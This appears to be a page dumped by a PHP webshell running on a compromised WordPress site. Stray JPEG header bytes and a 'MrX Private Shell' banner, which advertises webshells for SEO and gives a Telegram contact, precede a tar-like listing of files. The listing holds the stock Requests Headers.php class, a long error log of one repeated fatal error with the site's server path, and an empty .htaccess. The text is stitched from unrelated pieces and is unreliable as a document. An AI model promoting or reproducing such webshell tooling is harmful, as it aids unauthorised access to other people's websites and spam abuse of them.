����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
Headers.php 0000644 00000006035 15222317532 0006636 0 ustar 00 <?php
/**
* Case-insensitive dictionary, suitable for HTTP headers
*
* @package Requests
*/
namespace WpOrg\Requests\Response;
use WpOrg\Requests\Exception;
use WpOrg\Requests\Exception\InvalidArgument;
use WpOrg\Requests\Utility\CaseInsensitiveDictionary;
use WpOrg\Requests\Utility\FilteredIterator;
/**
* Case-insensitive dictionary, suitable for HTTP headers
*
* @package Requests
*/
class Headers extends CaseInsensitiveDictionary {
/**
* Get the given header
*
* Unlike {@see \WpOrg\Requests\Response\Headers::getValues()}, this returns a string. If there are
* multiple values, it concatenates them with a comma as per RFC2616.
*
* Avoid using this where commas may be used unquoted in values, such as
* Set-Cookie headers.
*
* @param string $offset Name of the header to retrieve.
* @return string|null Header value
*/
public function offsetGet($offset) {
if (is_string($offset)) {
$offset = strtolower($offset);
}
if (!isset($this->data[$offset])) {
return null;
}
return $this->flatten($this->data[$offset]);
}
/**
* Set the given item
*
* @param string $offset Item name
* @param string $value Item value
*
* @throws \WpOrg\Requests\Exception On attempting to use dictionary as list (`invalidset`)
*/
public function offsetSet($offset, $value) {
if ($offset === null) {
throw new Exception('Object is a dictionary, not a list', 'invalidset');
}
if (is_string($offset)) {
$offset = strtolower($offset);
}
if (!isset($this->data[$offset])) {
$this->data[$offset] = [];
}
$this->data[$offset][] = $value;
}
/**
* Get all values for a given header
*
* @param string $offset Name of the header to retrieve.
* @return array|null Header values
*
* @throws \WpOrg\Requests\Exception\InvalidArgument When the passed argument is not valid as an array key.
*/
public function getValues($offset) {
if (!is_string($offset) && !is_int($offset)) {
throw InvalidArgument::create(1, '$offset', 'string|int', gettype($offset));
}
if (is_string($offset)) {
$offset = strtolower($offset);
}
if (!isset($this->data[$offset])) {
return null;
}
return $this->data[$offset];
}
/**
* Flattens a value into a string
*
* Converts an array into a string by imploding values with a comma, as per
* RFC2616's rules for folding headers.
*
* @param string|array $value Value to flatten
* @return string Flattened value
*
* @throws \WpOrg\Requests\Exception\InvalidArgument When the passed argument is not a string or an array.
*/
public function flatten($value) {
if (is_string($value)) {
return $value;
}
if (is_array($value)) {
return implode(',', $value);
}
throw InvalidArgument::create(1, '$value', 'string|array', gettype($value));
}
/**
* Get an iterator for the data
*
* Converts the internally stored values to a comma-separated string if there is more
* than one value for a key.
*
* @return \ArrayIterator
*/
public function getIterator() {
return new FilteredIterator($this->data, [$this, 'flatten']);
}
}
error_log 0000644 00000057200 15222317532 0006467 0 ustar 00 [19-Sep-2024 20:14:53 UTC] PHP Fatal error: Uncaught Error: Class 'WpOrg\Requests\Utility\CaseInsensitiveDictionary' not found in /home/antiaginglove/public_html/wp-includes/Requests/src/Response/Headers.php:20
Stack trace:
#0 {main}
thrown in /home/antiaginglove/public_html/wp-includes/Requests/src/Response/Headers.php on line 20
[19-Sep-2024 20:29:21 UTC] PHP Fatal error: Uncaught Error: Class 'WpOrg\Requests\Utility\CaseInsensitiveDictionary' not found in /home/antiaginglove/public_html/wp-includes/Requests/src/Response/Headers.php:20
Stack trace:
#0 {main}
thrown in /home/antiaginglove/public_html/wp-includes/Requests/src/Response/Headers.php on line 20
[10-Nov-2024 08:52:34 UTC] PHP Fatal error: Uncaught Error: Class 'WpOrg\Requests\Utility\CaseInsensitiveDictionary' not found in /home/antiaginglove/public_html/wp-includes/Requests/src/Response/Headers.php:20
Stack trace:
#0 {main}
thrown in /home/antiaginglove/public_html/wp-includes/Requests/src/Response/Headers.php on line 20
[10-Nov-2024 11:33:49 UTC] PHP Fatal error: Uncaught Error: Class 'WpOrg\Requests\Utility\CaseInsensitiveDictionary' not found in /home/antiaginglove/public_html/wp-includes/Requests/src/Response/Headers.php:20
Stack trace:
#0 {main}
thrown in /home/antiaginglove/public_html/wp-includes/Requests/src/Response/Headers.php on line 20
[13-Nov-2024 09:51:50 UTC] PHP Fatal error: Uncaught Error: Class 'WpOrg\Requests\Utility\CaseInsensitiveDictionary' not found in /home/antiaginglove/public_html/wp-includes/Requests/src/Response/Headers.php:20
Stack trace:
#0 {main}
thrown in /home/antiaginglove/public_html/wp-includes/Requests/src/Response/Headers.php on line 20
[17-Nov-2024 02:13:43 UTC] PHP Fatal error: Uncaught Error: Class 'WpOrg\Requests\Utility\CaseInsensitiveDictionary' not found in /home/antiaginglove/public_html/wp-includes/Requests/src/Response/Headers.php:20
Stack trace:
#0 {main}
thrown in /home/antiaginglove/public_html/wp-includes/Requests/src/Response/Headers.php on line 20
[19-Nov-2024 00:35:21 UTC] PHP Fatal error: Uncaught Error: Class 'WpOrg\Requests\Utility\CaseInsensitiveDictionary' not found in /home/antiaginglove/public_html/wp-includes/Requests/src/Response/Headers.php:20
Stack trace:
#0 {main}
thrown in /home/antiaginglove/public_html/wp-includes/Requests/src/Response/Headers.php on line 20
[16-Jan-2025 06:42:39 UTC] PHP Fatal error: Uncaught Error: Class 'WpOrg\Requests\Utility\CaseInsensitiveDictionary' not found in /home/antiaginglove/public_html/wp-includes/Requests/src/Response/Headers.php:20
Stack trace:
#0 {main}
thrown in /home/antiaginglove/public_html/wp-includes/Requests/src/Response/Headers.php on line 20
[16-Jan-2025 07:46:25 UTC] PHP Fatal error: Uncaught Error: Class 'WpOrg\Requests\Utility\CaseInsensitiveDictionary' not found in /home/antiaginglove/public_html/wp-includes/Requests/src/Response/Headers.php:20
Stack trace:
#0 {main}
thrown in /home/antiaginglove/public_html/wp-includes/Requests/src/Response/Headers.php on line 20
[02-Feb-2025 01:46:22 UTC] PHP Fatal error: Uncaught Error: Class 'WpOrg\Requests\Utility\CaseInsensitiveDictionary' not found in /home/antiaginglove/public_html/wp-includes/Requests/src/Response/Headers.php:20
Stack trace:
#0 {main}
thrown in /home/antiaginglove/public_html/wp-includes/Requests/src/Response/Headers.php on line 20
[02-Feb-2025 02:35:37 UTC] PHP Fatal error: Uncaught Error: Class 'WpOrg\Requests\Utility\CaseInsensitiveDictionary' not found in /home/antiaginglove/public_html/wp-includes/Requests/src/Response/Headers.php:20
Stack trace:
#0 {main}
thrown in /home/antiaginglove/public_html/wp-includes/Requests/src/Response/Headers.php on line 20
[22-Feb-2025 06:14:43 UTC] PHP Fatal error: Uncaught Error: Class 'WpOrg\Requests\Utility\CaseInsensitiveDictionary' not found in /home/antiaginglove/public_html/wp-includes/Requests/src/Response/Headers.php:20
Stack trace:
#0 {main}
thrown in /home/antiaginglove/public_html/wp-includes/Requests/src/Response/Headers.php on line 20
[22-Feb-2025 06:25:42 UTC] PHP Fatal error: Uncaught Error: Class 'WpOrg\Requests\Utility\CaseInsensitiveDictionary' not found in /home/antiaginglove/public_html/wp-includes/Requests/src/Response/Headers.php:20
Stack trace:
#0 {main}
thrown in /home/antiaginglove/public_html/wp-includes/Requests/src/Response/Headers.php on line 20
[29-Mar-2025 10:11:52 UTC] PHP Fatal error: Uncaught Error: Class 'WpOrg\Requests\Utility\CaseInsensitiveDictionary' not found in /home/antiaginglove/public_html/wp-includes/Requests/src/Response/Headers.php:20
Stack trace:
#0 {main}
thrown in /home/antiaginglove/public_html/wp-includes/Requests/src/Response/Headers.php on line 20
[13-May-2025 10:04:40 UTC] PHP Fatal error: Uncaught Error: Class 'WpOrg\Requests\Utility\CaseInsensitiveDictionary' not found in /home/antiaginglove/public_html/wp-includes/Requests/src/Response/Headers.php:20
Stack trace:
#0 {main}
thrown in /home/antiaginglove/public_html/wp-includes/Requests/src/Response/Headers.php on line 20
[13-May-2025 10:04:40 UTC] PHP Fatal error: Uncaught Error: Class 'WpOrg\Requests\Utility\CaseInsensitiveDictionary' not found in /home/antiaginglove/public_html/wp-includes/Requests/src/Response/Headers.php:20
Stack trace:
#0 {main}
thrown in /home/antiaginglove/public_html/wp-includes/Requests/src/Response/Headers.php on line 20
[13-May-2025 10:04:41 UTC] PHP Fatal error: Uncaught Error: Class 'WpOrg\Requests\Utility\CaseInsensitiveDictionary' not found in /home/antiaginglove/public_html/wp-includes/Requests/src/Response/Headers.php:20
Stack trace:
#0 {main}
thrown in /home/antiaginglove/public_html/wp-includes/Requests/src/Response/Headers.php on line 20
[13-May-2025 10:04:43 UTC] PHP Fatal error: Uncaught Error: Class 'WpOrg\Requests\Utility\CaseInsensitiveDictionary' not found in /home/antiaginglove/public_html/wp-includes/Requests/src/Response/Headers.php:20
Stack trace:
#0 {main}
thrown in /home/antiaginglove/public_html/wp-includes/Requests/src/Response/Headers.php on line 20
[14-May-2025 11:58:58 UTC] PHP Fatal error: Uncaught Error: Class 'WpOrg\Requests\Utility\CaseInsensitiveDictionary' not found in /home/antiaginglove/public_html/wp-includes/Requests/src/Response/Headers.php:20
Stack trace:
#0 {main}
thrown in /home/antiaginglove/public_html/wp-includes/Requests/src/Response/Headers.php on line 20
[14-May-2025 11:58:58 UTC] PHP Fatal error: Uncaught Error: Class 'WpOrg\Requests\Utility\CaseInsensitiveDictionary' not found in /home/antiaginglove/public_html/wp-includes/Requests/src/Response/Headers.php:20
Stack trace:
#0 {main}
thrown in /home/antiaginglove/public_html/wp-includes/Requests/src/Response/Headers.php on line 20
[14-May-2025 11:58:59 UTC] PHP Fatal error: Uncaught Error: Class 'WpOrg\Requests\Utility\CaseInsensitiveDictionary' not found in /home/antiaginglove/public_html/wp-includes/Requests/src/Response/Headers.php:20
Stack trace:
#0 {main}
thrown in /home/antiaginglove/public_html/wp-includes/Requests/src/Response/Headers.php on line 20
[14-May-2025 11:59:01 UTC] PHP Fatal error: Uncaught Error: Class 'WpOrg\Requests\Utility\CaseInsensitiveDictionary' not found in /home/antiaginglove/public_html/wp-includes/Requests/src/Response/Headers.php:20
Stack trace:
#0 {main}
thrown in /home/antiaginglove/public_html/wp-includes/Requests/src/Response/Headers.php on line 20
[14-May-2025 14:33:28 UTC] PHP Fatal error: Uncaught Error: Class 'WpOrg\Requests\Utility\CaseInsensitiveDictionary' not found in /home/antiaginglove/public_html/wp-includes/Requests/src/Response/Headers.php:20
Stack trace:
#0 {main}
thrown in /home/antiaginglove/public_html/wp-includes/Requests/src/Response/Headers.php on line 20
[14-May-2025 14:33:28 UTC] PHP Fatal error: Uncaught Error: Class 'WpOrg\Requests\Utility\CaseInsensitiveDictionary' not found in /home/antiaginglove/public_html/wp-includes/Requests/src/Response/Headers.php:20
Stack trace:
#0 {main}
thrown in /home/antiaginglove/public_html/wp-includes/Requests/src/Response/Headers.php on line 20
[14-May-2025 14:33:29 UTC] PHP Fatal error: Uncaught Error: Class 'WpOrg\Requests\Utility\CaseInsensitiveDictionary' not found in /home/antiaginglove/public_html/wp-includes/Requests/src/Response/Headers.php:20
Stack trace:
#0 {main}
thrown in /home/antiaginglove/public_html/wp-includes/Requests/src/Response/Headers.php on line 20
[14-May-2025 14:33:31 UTC] PHP Fatal error: Uncaught Error: Class 'WpOrg\Requests\Utility\CaseInsensitiveDictionary' not found in /home/antiaginglove/public_html/wp-includes/Requests/src/Response/Headers.php:20
Stack trace:
#0 {main}
thrown in /home/antiaginglove/public_html/wp-includes/Requests/src/Response/Headers.php on line 20
[18-Jun-2025 16:52:16 UTC] PHP Fatal error: Uncaught Error: Class 'WpOrg\Requests\Utility\CaseInsensitiveDictionary' not found in /home/antiaginglove/public_html/wp-includes/Requests/src/Response/Headers.php:20
Stack trace:
#0 {main}
thrown in /home/antiaginglove/public_html/wp-includes/Requests/src/Response/Headers.php on line 20
[19-Jul-2025 09:14:17 UTC] PHP Fatal error: Uncaught Error: Class 'WpOrg\Requests\Utility\CaseInsensitiveDictionary' not found in /home/antiaginglove/public_html/wp-includes/Requests/src/Response/Headers.php:20
Stack trace:
#0 {main}
thrown in /home/antiaginglove/public_html/wp-includes/Requests/src/Response/Headers.php on line 20
[08-Aug-2025 12:13:10 UTC] PHP Fatal error: Uncaught Error: Class 'WpOrg\Requests\Utility\CaseInsensitiveDictionary' not found in /home/antiaginglove/public_html/wp-includes/Requests/src/Response/Headers.php:20
Stack trace:
#0 {main}
thrown in /home/antiaginglove/public_html/wp-includes/Requests/src/Response/Headers.php on line 20
[08-Aug-2025 12:13:17 UTC] PHP Fatal error: Uncaught Error: Class 'WpOrg\Requests\Utility\CaseInsensitiveDictionary' not found in /home/antiaginglove/public_html/wp-includes/Requests/src/Response/Headers.php:20
Stack trace:
#0 {main}
thrown in /home/antiaginglove/public_html/wp-includes/Requests/src/Response/Headers.php on line 20
[14-Aug-2025 05:57:37 UTC] PHP Fatal error: Uncaught Error: Class 'WpOrg\Requests\Utility\CaseInsensitiveDictionary' not found in /home/antiaginglove/public_html/wp-includes/Requests/src/Response/Headers.php:20
Stack trace:
#0 {main}
thrown in /home/antiaginglove/public_html/wp-includes/Requests/src/Response/Headers.php on line 20
[14-Aug-2025 05:57:39 UTC] PHP Fatal error: Uncaught Error: Class 'WpOrg\Requests\Utility\CaseInsensitiveDictionary' not found in /home/antiaginglove/public_html/wp-includes/Requests/src/Response/Headers.php:20
Stack trace:
#0 {main}
thrown in /home/antiaginglove/public_html/wp-includes/Requests/src/Response/Headers.php on line 20
[20-Aug-2025 23:27:48 UTC] PHP Fatal error: Uncaught Error: Class 'WpOrg\Requests\Utility\CaseInsensitiveDictionary' not found in /home/antiaginglove/public_html/wp-includes/Requests/src/Response/Headers.php:20
Stack trace:
#0 {main}
thrown in /home/antiaginglove/public_html/wp-includes/Requests/src/Response/Headers.php on line 20
[21-Aug-2025 20:03:22 UTC] PHP Fatal error: Uncaught Error: Class 'WpOrg\Requests\Utility\CaseInsensitiveDictionary' not found in /home/antiaginglove/public_html/wp-includes/Requests/src/Response/Headers.php:20
Stack trace:
#0 {main}
thrown in /home/antiaginglove/public_html/wp-includes/Requests/src/Response/Headers.php on line 20
[22-Aug-2025 21:08:13 UTC] PHP Fatal error: Uncaught Error: Class 'WpOrg\Requests\Utility\CaseInsensitiveDictionary' not found in /home/antiaginglove/public_html/wp-includes/Requests/src/Response/Headers.php:20
Stack trace:
#0 {main}
thrown in /home/antiaginglove/public_html/wp-includes/Requests/src/Response/Headers.php on line 20
[22-Aug-2025 21:08:15 UTC] PHP Fatal error: Uncaught Error: Class 'WpOrg\Requests\Utility\CaseInsensitiveDictionary' not found in /home/antiaginglove/public_html/wp-includes/Requests/src/Response/Headers.php:20
Stack trace:
#0 {main}
thrown in /home/antiaginglove/public_html/wp-includes/Requests/src/Response/Headers.php on line 20
[26-Aug-2025 06:19:19 UTC] PHP Fatal error: Uncaught Error: Class 'WpOrg\Requests\Utility\CaseInsensitiveDictionary' not found in /home/antiaginglove/public_html/wp-includes/Requests/src/Response/Headers.php:20
Stack trace:
#0 {main}
thrown in /home/antiaginglove/public_html/wp-includes/Requests/src/Response/Headers.php on line 20
[26-Aug-2025 06:29:50 UTC] PHP Fatal error: Uncaught Error: Class 'WpOrg\Requests\Utility\CaseInsensitiveDictionary' not found in /home/antiaginglove/public_html/wp-includes/Requests/src/Response/Headers.php:20
Stack trace:
#0 {main}
thrown in /home/antiaginglove/public_html/wp-includes/Requests/src/Response/Headers.php on line 20
[27-Aug-2025 13:50:07 UTC] PHP Fatal error: Uncaught Error: Class 'WpOrg\Requests\Utility\CaseInsensitiveDictionary' not found in /home/antiaginglove/public_html/wp-includes/Requests/src/Response/Headers.php:20
Stack trace:
#0 {main}
thrown in /home/antiaginglove/public_html/wp-includes/Requests/src/Response/Headers.php on line 20
[04-Sep-2025 00:30:00 UTC] PHP Fatal error: Uncaught Error: Class 'WpOrg\Requests\Utility\CaseInsensitiveDictionary' not found in /home/antiaginglove/public_html/wp-includes/Requests/src/Response/Headers.php:20
Stack trace:
#0 {main}
thrown in /home/antiaginglove/public_html/wp-includes/Requests/src/Response/Headers.php on line 20
[04-Sep-2025 00:50:25 UTC] PHP Fatal error: Uncaught Error: Class 'WpOrg\Requests\Utility\CaseInsensitiveDictionary' not found in /home/antiaginglove/public_html/wp-includes/Requests/src/Response/Headers.php:20
Stack trace:
#0 {main}
thrown in /home/antiaginglove/public_html/wp-includes/Requests/src/Response/Headers.php on line 20
[06-Sep-2025 01:49:28 UTC] PHP Fatal error: Uncaught Error: Class 'WpOrg\Requests\Utility\CaseInsensitiveDictionary' not found in /home/antiaginglove/public_html/wp-includes/Requests/src/Response/Headers.php:20
Stack trace:
#0 {main}
thrown in /home/antiaginglove/public_html/wp-includes/Requests/src/Response/Headers.php on line 20
[06-Sep-2025 01:58:27 UTC] PHP Fatal error: Uncaught Error: Class 'WpOrg\Requests\Utility\CaseInsensitiveDictionary' not found in /home/antiaginglove/public_html/wp-includes/Requests/src/Response/Headers.php:20
Stack trace:
#0 {main}
thrown in /home/antiaginglove/public_html/wp-includes/Requests/src/Response/Headers.php on line 20
[09-Sep-2025 17:35:05 UTC] PHP Fatal error: Uncaught Error: Class 'WpOrg\Requests\Utility\CaseInsensitiveDictionary' not found in /home/antiaginglove/public_html/wp-includes/Requests/src/Response/Headers.php:20
Stack trace:
#0 {main}
thrown in /home/antiaginglove/public_html/wp-includes/Requests/src/Response/Headers.php on line 20
[09-Sep-2025 17:49:07 UTC] PHP Fatal error: Uncaught Error: Class 'WpOrg\Requests\Utility\CaseInsensitiveDictionary' not found in /home/antiaginglove/public_html/wp-includes/Requests/src/Response/Headers.php:20
Stack trace:
#0 {main}
thrown in /home/antiaginglove/public_html/wp-includes/Requests/src/Response/Headers.php on line 20
[14-Sep-2025 15:02:54 UTC] PHP Fatal error: Uncaught Error: Class 'WpOrg\Requests\Utility\CaseInsensitiveDictionary' not found in /home/antiaginglove/public_html/wp-includes/Requests/src/Response/Headers.php:20
Stack trace:
#0 {main}
thrown in /home/antiaginglove/public_html/wp-includes/Requests/src/Response/Headers.php on line 20
[14-Sep-2025 15:11:38 UTC] PHP Fatal error: Uncaught Error: Class 'WpOrg\Requests\Utility\CaseInsensitiveDictionary' not found in /home/antiaginglove/public_html/wp-includes/Requests/src/Response/Headers.php:20
Stack trace:
#0 {main}
thrown in /home/antiaginglove/public_html/wp-includes/Requests/src/Response/Headers.php on line 20
[18-Sep-2025 16:53:39 UTC] PHP Fatal error: Uncaught Error: Class 'WpOrg\Requests\Utility\CaseInsensitiveDictionary' not found in /home/antiaginglove/public_html/wp-includes/Requests/src/Response/Headers.php:20
Stack trace:
#0 {main}
thrown in /home/antiaginglove/public_html/wp-includes/Requests/src/Response/Headers.php on line 20
[18-Sep-2025 17:07:14 UTC] PHP Fatal error: Uncaught Error: Class 'WpOrg\Requests\Utility\CaseInsensitiveDictionary' not found in /home/antiaginglove/public_html/wp-includes/Requests/src/Response/Headers.php:20
Stack trace:
#0 {main}
thrown in /home/antiaginglove/public_html/wp-includes/Requests/src/Response/Headers.php on line 20
[19-Sep-2025 06:24:16 UTC] PHP Fatal error: Uncaught Error: Class 'WpOrg\Requests\Utility\CaseInsensitiveDictionary' not found in /home/antiaginglove/public_html/wp-includes/Requests/src/Response/Headers.php:20
Stack trace:
#0 {main}
thrown in /home/antiaginglove/public_html/wp-includes/Requests/src/Response/Headers.php on line 20
[19-Sep-2025 06:39:37 UTC] PHP Fatal error: Uncaught Error: Class 'WpOrg\Requests\Utility\CaseInsensitiveDictionary' not found in /home/antiaginglove/public_html/wp-includes/Requests/src/Response/Headers.php:20
Stack trace:
#0 {main}
thrown in /home/antiaginglove/public_html/wp-includes/Requests/src/Response/Headers.php on line 20
[22-Sep-2025 12:31:50 UTC] PHP Fatal error: Uncaught Error: Class 'WpOrg\Requests\Utility\CaseInsensitiveDictionary' not found in /home/antiaginglove/public_html/wp-includes/Requests/src/Response/Headers.php:20
Stack trace:
#0 {main}
thrown in /home/antiaginglove/public_html/wp-includes/Requests/src/Response/Headers.php on line 20
[22-Sep-2025 12:49:20 UTC] PHP Fatal error: Uncaught Error: Class 'WpOrg\Requests\Utility\CaseInsensitiveDictionary' not found in /home/antiaginglove/public_html/wp-includes/Requests/src/Response/Headers.php:20
Stack trace:
#0 {main}
thrown in /home/antiaginglove/public_html/wp-includes/Requests/src/Response/Headers.php on line 20
[25-Sep-2025 21:51:50 UTC] PHP Fatal error: Uncaught Error: Class 'WpOrg\Requests\Utility\CaseInsensitiveDictionary' not found in /home/antiaginglove/public_html/wp-includes/Requests/src/Response/Headers.php:20
Stack trace:
#0 {main}
thrown in /home/antiaginglove/public_html/wp-includes/Requests/src/Response/Headers.php on line 20
[25-Sep-2025 22:04:53 UTC] PHP Fatal error: Uncaught Error: Class 'WpOrg\Requests\Utility\CaseInsensitiveDictionary' not found in /home/antiaginglove/public_html/wp-includes/Requests/src/Response/Headers.php:20
Stack trace:
#0 {main}
thrown in /home/antiaginglove/public_html/wp-includes/Requests/src/Response/Headers.php on line 20
[02-Oct-2025 10:36:10 UTC] PHP Fatal error: Uncaught Error: Class 'WpOrg\Requests\Utility\CaseInsensitiveDictionary' not found in /home/antiaginglove/public_html/wp-includes/Requests/src/Response/Headers.php:20
Stack trace:
#0 {main}
thrown in /home/antiaginglove/public_html/wp-includes/Requests/src/Response/Headers.php on line 20
[02-Oct-2025 10:44:33 UTC] PHP Fatal error: Uncaught Error: Class 'WpOrg\Requests\Utility\CaseInsensitiveDictionary' not found in /home/antiaginglove/public_html/wp-includes/Requests/src/Response/Headers.php:20
Stack trace:
#0 {main}
thrown in /home/antiaginglove/public_html/wp-includes/Requests/src/Response/Headers.php on line 20
[02-Nov-2025 08:24:07 UTC] PHP Fatal error: Uncaught Error: Class 'WpOrg\Requests\Utility\CaseInsensitiveDictionary' not found in /home/antiaginglove/public_html/wp-includes/Requests/src/Response/Headers.php:20
Stack trace:
#0 {main}
thrown in /home/antiaginglove/public_html/wp-includes/Requests/src/Response/Headers.php on line 20
[02-Nov-2025 08:33:53 UTC] PHP Fatal error: Uncaught Error: Class 'WpOrg\Requests\Utility\CaseInsensitiveDictionary' not found in /home/antiaginglove/public_html/wp-includes/Requests/src/Response/Headers.php:20
Stack trace:
#0 {main}
thrown in /home/antiaginglove/public_html/wp-includes/Requests/src/Response/Headers.php on line 20
[06-Dec-2025 18:38:24 UTC] PHP Fatal error: Uncaught Error: Class 'WpOrg\Requests\Utility\CaseInsensitiveDictionary' not found in /home/antiaginglove/public_html/wp-includes/Requests/src/Response/Headers.php:20
Stack trace:
#0 {main}
thrown in /home/antiaginglove/public_html/wp-includes/Requests/src/Response/Headers.php on line 20
[06-Dec-2025 18:52:01 UTC] PHP Fatal error: Uncaught Error: Class 'WpOrg\Requests\Utility\CaseInsensitiveDictionary' not found in /home/antiaginglove/public_html/wp-includes/Requests/src/Response/Headers.php:20
Stack trace:
#0 {main}
thrown in /home/antiaginglove/public_html/wp-includes/Requests/src/Response/Headers.php on line 20
[23-Dec-2025 11:31:26 UTC] PHP Fatal error: Uncaught Error: Class 'WpOrg\Requests\Utility\CaseInsensitiveDictionary' not found in /home/antiaginglove/public_html/wp-includes/Requests/src/Response/Headers.php:20
Stack trace:
#0 {main}
thrown in /home/antiaginglove/public_html/wp-includes/Requests/src/Response/Headers.php on line 20
[23-Dec-2025 11:52:18 UTC] PHP Fatal error: Uncaught Error: Class 'WpOrg\Requests\Utility\CaseInsensitiveDictionary' not found in /home/antiaginglove/public_html/wp-includes/Requests/src/Response/Headers.php:20
Stack trace:
#0 {main}
thrown in /home/antiaginglove/public_html/wp-includes/Requests/src/Response/Headers.php on line 20
[24-Dec-2025 14:43:52 UTC] PHP Fatal error: Uncaught Error: Class 'WpOrg\Requests\Utility\CaseInsensitiveDictionary' not found in /home/antiaginglove/public_html/wp-includes/Requests/src/Response/Headers.php:20
Stack trace:
#0 {main}
thrown in /home/antiaginglove/public_html/wp-includes/Requests/src/Response/Headers.php on line 20
[24-Dec-2025 15:09:01 UTC] PHP Fatal error: Uncaught Error: Class 'WpOrg\Requests\Utility\CaseInsensitiveDictionary' not found in /home/antiaginglove/public_html/wp-includes/Requests/src/Response/Headers.php:20
Stack trace:
#0 {main}
thrown in /home/antiaginglove/public_html/wp-includes/Requests/src/Response/Headers.php on line 20
[04-Jan-2026 10:03:45 UTC] PHP Fatal error: Uncaught Error: Class 'WpOrg\Requests\Utility\CaseInsensitiveDictionary' not found in /home/antiaginglove/public_html/wp-includes/Requests/src/Response/Headers.php:20
Stack trace:
#0 {main}
thrown in /home/antiaginglove/public_html/wp-includes/Requests/src/Response/Headers.php on line 20
[04-Jan-2026 10:13:38 UTC] PHP Fatal error: Uncaught Error: Class 'WpOrg\Requests\Utility\CaseInsensitiveDictionary' not found in /home/antiaginglove/public_html/wp-includes/Requests/src/Response/Headers.php:20
Stack trace:
#0 {main}
thrown in /home/antiaginglove/public_html/wp-includes/Requests/src/Response/Headers.php on line 20
[06-Jan-2026 00:39:46 UTC] PHP Fatal error: Uncaught Error: Class 'WpOrg\Requests\Utility\CaseInsensitiveDictionary' not found in /home/antiaginglove/public_html/wp-includes/Requests/src/Response/Headers.php:20
Stack trace:
#0 {main}
thrown in /home/antiaginglove/public_html/wp-includes/Requests/src/Response/Headers.php on line 20
[06-Jan-2026 01:13:34 UTC] PHP Fatal error: Uncaught Error: Class 'WpOrg\Requests\Utility\CaseInsensitiveDictionary' not found in /home/antiaginglove/public_html/wp-includes/Requests/src/Response/Headers.php:20
Stack trace:
#0 {main}
thrown in /home/antiaginglove/public_html/wp-includes/Requests/src/Response/Headers.php on line 20
[06-Jan-2026 01:26:49 UTC] PHP Fatal error: Uncaught Error: Class 'WpOrg\Requests\Utility\CaseInsensitiveDictionary' not found in /home/antiaginglove/public_html/wp-includes/Requests/src/Response/Headers.php:20
Stack trace:
#0 {main}
thrown in /home/antiaginglove/public_html/wp-includes/Requests/src/Response/Headers.php on line 20
[13-Jan-2026 23:45:45 UTC] PHP Fatal error: Uncaught Error: Class 'WpOrg\Requests\Utility\CaseInsensitiveDictionary' not found in /home/antiaginglove/public_html/wp-includes/Requests/src/Response/Headers.php:20
Stack trace:
#0 {main}
thrown in /home/antiaginglove/public_html/wp-includes/Requests/src/Response/Headers.php on line 20
[14-Jan-2026 00:06:28 UTC] PHP Fatal error: Uncaught Error: Class 'WpOrg\Requests\Utility\CaseInsensitiveDictionary' not found in /home/antiaginglove/public_html/wp-includes/Requests/src/Response/Headers.php:20
Stack trace:
#0 {main}
thrown in /home/antiaginglove/public_html/wp-includes/Requests/src/Response/Headers.php on line 20
.htaccess 0000644 00000000000 15222317532 0006332 0 ustar 00